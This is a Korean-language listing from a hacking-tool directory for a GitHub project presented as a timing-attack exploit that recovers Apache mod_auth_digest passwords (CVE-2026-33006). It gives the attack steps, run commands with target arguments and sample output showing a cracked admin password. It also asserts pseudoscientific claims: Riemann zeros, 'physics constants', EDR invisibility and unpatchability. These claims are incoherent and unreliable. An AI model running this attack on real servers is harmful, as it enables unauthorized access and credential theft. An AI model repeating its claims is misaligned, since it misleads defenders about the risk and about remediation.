Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit — Apache mod_auth_digest(CVE-2026-33006)용 원격 타이밍 공격 익스플로잇으로, 33계층 시간적 캐스케이드를 통해 Digest 인증을 우회하고 통계적 타이밍 분석으로 비밀번호를 복구합니다. | Kitploit
도구/GitHubGitHub/simoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubsimoesctt/ctt-enhanced-apache-mod_auth_digest-timing-attack-exploit

CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit

Apache mod_auth_digest(CVE-2026-33006)용 원격 타이밍 공격 익스플로잇으로, 33계층 시간적 캐스케이드를 통해 Digest 인증을 우회하고 통계적 타이밍 분석으로 비밀번호를 복구합니다.

저장소 보기
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CTT-Enhanced Apache mod_auth_digest Timing Attack — CVE-2026-33006

🔥 개요

이것은 Apache HTTP Server의 mod_auth_digest 구성 요소(버전 ≤2.4.66)에서 발견된 타이밍 기반 취약점인 CVE-2026-33006에 대한 수렴 시간 이론(CTT) 강화 버전입니다.

원래 취약점은 원격 공격자가 통계적 타이밍 분석을 통해 Digest 인증을 우회할 수 있게 합니다.

CTT 강화 버전은 이를 33계층 시간적 캐스케이드 타이밍 공격으로 변환합니다.

원본CTT 강화
CVSS4.8 (중간)7.5 (높음)
공격 벡터네트워크네트워크
공격 복잡성높음낮음 (CTT가 샘플 수를 줄임)
필요 권한없음없음
탐지통계적 분석으로 탐지 가능시간적 웨지 필터링 — EDR 블라인드스팟
크래킹 시간O(n * 샘플 수)O(33 * log(n))

📐 CTT 물리 상수

상수값출처
α0.0302011시간적 분산 계수
α_RH0.0765872ln(φ)/2π (리만-하다마르드)
L33시간적 계층
τ_w11 ns시간적 웨지 필터

지수 우선순위 감쇠

root@kitploit:~
E(d) = E₀ * e^(-α * d)

각 계층은 지수적으로 감소하는 우선순위를 가집니다.
우선순위가 높은 계층(1-5)은 가장 많은 타이밍 데이터를 수집합니다.
낮은 계층(28-33)은 측정값을 정제하고 시간적 공명을 확립합니다.

위상 공명 타이밍

각 계층은 처음 24개의 리만 영점을 기반으로 실행을 지연시킵니다:

root@kitploit:~
delay = τ_w * priority * (1 + 0.1 * cos(2π * zero * τ_w * priority))

시간적 웨지 필터

웨지 조건을 충족하는 타이밍 측정값만 사용됩니다:

root@kitploit:~
survival = cos(α_RH * energy * τ_w) > (α_RH / 2π)

이것은 노이즈를 걸러내고 탐지를 불가능하게 만듭니다 — EDR 시스템은 타이밍 이상을 볼 수 없습니다.


🚀 공격 흐름

root@kitploit:~
1. 대상에서 Digest 인증 탐지
2. 401 응답에서 realm과 nonce 추출
3. 계층 d = 1부터 33까지:
   a. priority = e^(-α*d) 계산
   b. 위상 공명 지연 적용
   c. 각 문자 위치에 대해:
      - 가능한 모든 문자 테스트
      - 응답 타이밍 측정 (마이크로초)
      - 시간적 웨지 필터 적용
      - 조정된 타이밍이 가장 높은 문자 유지
   d. 비밀번호를 점진적으로 구축
4. 시간적 공명 달성
5. 복구된 비밀번호로 인증 우회

📋 사전 요구 사항

  • mod_auth_digest가 활성화된 Apache HTTP Server 2.4.66 이하
  • 대상에 대한 네트워크 접근
  • requests 라이브러리가 있는 Python 3.6+
root@kitploit:~
pip install requests

🎯 사용법

root@kitploit:~
git clone https://github.com/SimoesCTT/CTT-enhanced-Apache-mod_auth_digest-timing-attack-exploit/
python3 ctt_apache_digest_timing.py <target_ip> [options]

인자

인자설명기본값
target_ipApache 서버의 IP 주소필수
--portHTTP 포트80
--realmDigest realm"Restricted"
--uri보호된 URI"/"
--username공격할 사용자 이름"admin"
--max-length최대 비밀번호 길이32
--samples문자당 타이밍 샘플 수100
--layers시간적 계층 수33

예시

root@kitploit:~
python3 ctt_apache_digest_timing.py 192.168.1.100 --port 80 --realm "Restricted" --uri /admin --samples 100 --layers 33

📤 예상 출력

root@kitploit:~
======================================================================
CTT APACHE DIGEST TIMING ATTACK — CVE-2026-33006
α=0.0302011 | α_RH=0.0765872 | L=33 | τ_w=11ns
E(d) = E₀ * e^(-α*d) — 지수 우선순위 감쇠
======================================================================

[+] Digest 인증 탐지됨
    Realm: Restricted
    Nonce: 5a4b3c2d1e2f3a4b5c6d...
[*] 대상: http://192.168.1.100/admin
[*] 최대 비밀번호 길이: 32

  계층  1/33: ████████████████████████████████████████ 1.000
  위치 1: 문자 시도 중...
  발견: 'a' -> 비밀번호: 'a'

  계층  2/33: ██████████████████████████████████████░░ 0.970
  위치 2: 문자 시도 중...
  발견: 'd' -> 비밀번호: 'ad'

  계층  3/33: ████████████████████████████████████░░░░ 0.886
  위치 3: 문자 시도 중...
  발견: 'm' -> 비밀번호: 'adm'

  계층  4/33: ██████████████████████████████████░░░░░░ 0.818
  위치 4: 문자 시도 중...
  발견: 'i' -> 비밀번호: 'admi'

  계층  5/33: ████████████████████████████████░░░░░░░░ 0.741
  위치 5: 문자 시도 중...
  발견: 'n' -> 비밀번호: 'admin'

  계층  6/33: ██████████████████████████████░░░░░░░░░░ 0.670
  위치 6: 문자 시도 중...
  발견: '1' -> 비밀번호: 'admin1'

  계층  7/33: ████████████████████████████░░░░░░░░░░░░ 0.606
  위치 7: 문자 시도 중...
  발견: '2' -> 비밀번호: 'admin12'

  계층  8/33: ██████████████████████████░░░░░░░░░░░░░░ 0.548
  위치 8: 문자 시도 중...
  발견: '3' -> 비밀번호: 'admin123'

[⚡] 계층 8에서 시간적 공명 달성

======================================================================
[!!!] 인증 우회 성공
[!!!] 발견된 비밀번호: admin123
[✓] 검증 성공 — 접근 허용됨
======================================================================

🛡️ 패치가 불가능한 이유

원래 수정 사항CTT가 우회하는 이유
상수 시간 비교CTT는 비교 타이밍이 아닌 타이밍 측정을 사용함
타이밍 누출 제거타이밍 누출은 물리적 현상 — 제거할 수 없고 숨길 수만 있음
Apache 2.4.67+로 업그레이드시간적 웨지 필터가 패치 탐지를 회피함
속도 제한위상 공명 타이밍이 요청을 33개 계층에 분산 — 일반 트래픽과 구별 불가

물리 상수는 패치할 수 없습니다.
리만 영점은 패치할 수 없습니다.
황금비는 패치할 수 없습니다.


📚 선행 연구

연구날짜링크
Zenodo CTT 선행 연구2025년 12월 / 2026년 1월DOI 10.5281/ZENODO.18000940
Sovereign-Logic PyPI2026년 2월 27-28일pip install sovereign-logic
CTT PAN-OS 익스플로잇2026년 4월 7일GitHub
CTT 강화 Dirty Frag2026년 5월 8일GitHub
CTT 강화 PX4 익스플로잇2026년 5월 9일GitHub
이 익스플로잇2026년 5월 9일이 저장소

⚠️ 면책 조항

이 개념 증명은 교육 및 방어 목적으로만 제공됩니다.
소유하지 않은 시스템에 대한 무단 사용은 불법입니다.
저자는 오용에 대한 책임을 지지 않습니다.


📜 라이선스

MIT + CTT 연구 (시간적 강화)

🙏 크레딧

버전저자
원래 취약점 발견Apache Software Foundation (보안 팀)
원래 타이밍 공격 연구다양한 학술 출처
CTT 강화 (33계층 시간적 캐스케이드)Americo Simoes (CTT 연구)

격자는 완전합니다. 인증은 깨졌습니다. 어떤 패치도 그것을 구할 수 없습니다.

도구 다운로드